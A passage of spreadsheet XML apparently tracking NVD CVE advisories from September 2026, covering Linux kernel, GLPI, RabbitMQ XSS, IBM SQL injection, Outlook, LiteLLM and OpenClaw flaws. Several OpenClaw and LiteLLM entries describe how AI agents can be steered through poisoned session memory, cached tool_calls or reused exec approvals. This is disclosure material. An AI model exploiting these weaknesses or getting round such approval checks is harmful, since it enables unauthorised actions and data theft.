      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr"/>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Don't read the U65 rounding mode as a storage mode
Bits 15:14 of NPU_SET_{IFM,OFM}_PRECISION select the activation storage
mode on U85 only. On U65 the same field holds the rounding mode, and the
command stream parser has read it as a storage mode since the driver was
added.
That went unnoticed while unknown values fell through the switch, but
now that they are rejected, every U65 command stream that asks for
natural rounding (2) fails CMDSTREAM_BO_CREATE with -EINVAL. Mesa emits
it for average pooling, concatenation, split, unpack, strided slice, LUT
and argmax, which is 72 failures of the Teflon test suite on an i.MX93.
Truncating rounding (1) is misread as well: it picks the two-tile
address path and computes a bogus feature map size from tile bases the
command stream never set.
Read the field as a storage mode only on the hardware where it is one.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98143</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98156</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr"/>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/virtio: use the DMA API for resource backing on Xen
On a Xen PV domain page addresses bear no relation to the real machine
addresses the host would have to use to reach it.
virtio_ring.c handles this correctly, vring_use_map_api() returns true
for any xen_domain() regardless of VIRTIO_F_ACCESS_PLATFORM.
virtio-gpu makes the same decision independently, but its copy
looks only at the feature bit:
	bool use_dma_api = !virtio_has_dma_quirk(vgdev-&gt;vdev);
QEMU does not set iommu_platform on virtio-vga by default, so
VIRTIO_F_ACCESS_PLATFORM is not negotiated, use_dma_api is false, and
virtio_gpu_object_shmem_init() describes the framebuffer's backing pages
to the host with sg_phys().  Those are guest-physical addresses. In a PV
domain they resolve, on the host side, to pages belonging to some other
domain, so the host scans out unrelated memory.
Move the decision into virtio_gpu_use_dma_api() and give it the
xen_domain() check, like vring_use_map_api() has. This
additionally enables the dma_sync_sgtable_for_device() calls in
virtgpu_vq.c, which are required for correctness whenever swiotlb
is in play.
Reproduced with a Xen 4.21 PV dom0 nested inside QEMU 8.2 with
virtio-vga, on both a distro 6.8 kernel and 6.18 LTS. A PVH dom0
works fine and doesn't need this fix because it is identity-mapped,
only PV dom0s are affected.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98156</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49470</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.0 until 11.0.8, the time-based one-time password verification endpoint does not limit failed submissions per user. An attacker who has obtained a user's primary authentication credentials can repeatedly submit TOTP values against the MFA verification flow, making brute-force compromise of the second factor and subsequent account takeover possible. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49470</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89032</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>BerriAI LiteLLM before 1.101.0-rc.1 contains a tenant isolation bypass vulnerability in the semantic cache layer that allows authenticated users to read other tenants' cached responses by exploiting a metadata key mismatch between _get_semantic_cache_tenant_scope() and _get_metadata_variable_name(). Attackers holding a valid virtual key can submit semantically similar prompts on affected routes such as /v1/responses and /bedrock/* to retrieve cached responses containing other tenants' personally identifiable information, financial data, or source code, and can cause agentic front-ends to auto-execute attacker-supplied tool calls under victim credentials by returning cached function_call or tool_calls payloads to a different principal.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89032</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100578</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.7.1 fails to restrict owner-only infrastructure tools exposed through the chat.send endpoint. In Gateway deployments using authentication modes that honor caller identity and narrower operator scopes, a write-scoped non-owner caller can start a chat turn whose tool inventory includes the `gateway` and `cron` tools, causing the agent to invoke owner-only configuration or scheduling operations, including persistent state changes. Practical impact depends on the tools selected by the model and the caller's ability to steer the turn. Shared-secret token and password callers are treated as fully trusted operators under OpenClaw's security model and are outside the scope of this issue. The issue is fixed in 2026.7.1; as a workaround, restrict chat.send to administrators in identity-bearing deployments and remove `gateway` and `cron` from affected agent tool policies.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100578</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100579</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 incorrectly trusts requester provenance in message.action. In identity-bearing Gateway deployments (authentication modes that honor caller identity and narrower operator scopes), a write-scoped caller can supply another sender's identifier to the channel authorization checks and invoke a channel action under that spoofed requester identity, reaching operations the channel adapter would have denied to the real caller. Practical impact depends on the enabled channel, the action, and the target account's permissions. Shared-secret token and password callers are full trusted operators under OpenClaw's security model and are out of scope. The issue is fixed in 2026.7.1; as a workaround, restrict message.action to administrators and disable sensitive channel actions that rely on requester identity.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100579</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67239</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.18 and 4.0.23 and 4.1.14 and 4.2.9 and 4.3.3, Stored XSS via TLS peer-certificate DN in stream-management UI (sibling of V-11). lines 102/106/110 render peercertsubject / peercertissuer with raw &lt;%= %&gt; and no fmtstring(). RFC4514 backslash-escaping of &lt;/&gt; is HTML-inert and bypassable (&lt;img ... //&gt;). Requires non-default config: a stream TLS listener with verifypeer and an attacker-obtainable trusted cert with a malicious Same as the connection.ejs finding, against operators viewing the stream-connection detail rabbitmqstream + rabbitmqstreammanagement enabled with a TLS listener using verifypeer Attacker can obtain a certificate signed by a CA the listener trusts, with attacker-chosen DN An operator views the. This issue is fixed in versions 3.13.18 and 4.0.23 and 4.1.14 and 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67239</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84893</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>IBM Guardium Data Protection 12.2 is vulnerable to SQL injection in the PESI service. An authenticated attacker could exploit this vulnerability to access sensitive information in the internal database.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84893</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100208</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100208</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100535</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>npm, gin, rust</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.4.5 and &lt; 2026.8.1 can lose the originating requester's restrictions and untrusted provenance when session-derived text is persisted to session memory. In deployments where session-memory capture and dreaming are enabled, a restricted external sender whose messages are admitted with limited tools can persist instructions that are later supplied to an unattended background (dreaming) agent holding broader file and command capabilities, allowing actions beyond the authority of the original turn and affecting files, commands, or services available to that agent. Exploitation requires the content to be captured, selected for later processing, and followed by the model. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100535</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100541</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>OpenClaw's Matrix integration (npm package @openclaw/matrix) versions &gt;= 2026.2.2 and &lt; 2026.8.1 lowercase complete Matrix user IDs — including historical localparts and the case-sensitive server-name portion — when deriving the OpenClaw authorization identity. As a result, distinct authenticated Matrix accounts can normalize to the same authorization identity. A Matrix participant controlling a colliding account identifier (a protocol-valid identifier that differs from the configured one only by characters OpenClaw case/Unicode folds; display-name matching is not required) can inherit allowlist, owner-command, exec-approval, or plugin-approval authority configured for another account. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100541</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100543</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>npm, go, gin</t>
        </is>
      </c>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package openclaw) before 2026.8.1 could include deterministic hashes computed over the original, unredacted configuration in redacted configuration responses. When the Gateway password had low entropy and the remaining configuration values were reconstructable, these hashes acted as offline password verifiers: a caller able to obtain the redacted configuration (for example via config.get) could test password candidates offline without going through the rate-limited Gateway authentication path. Recovering the password could grant the documented shared-secret operator authority. Secret references were not affected in the same way. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100543</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100558</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a resource exhaustion vulnerability in the Gateway listener that allows unauthenticated clients to retain response sockets by sending WebSocket upgrade requests without matching connection semantics. Attackers can repeatedly send malformed upgrade requests to exhaust listener resources and cause denial of service without consuming the WebSocket pre-auth connection budget.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100558</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100560</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization bypass vulnerability where Allow Always approvals for exact commands persist as path-only grants on macOS and Linux. Attackers can reuse the same executable with different arguments to execute commands without triggering new approval prompts, potentially accessing files or internal services.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100560</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10758</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
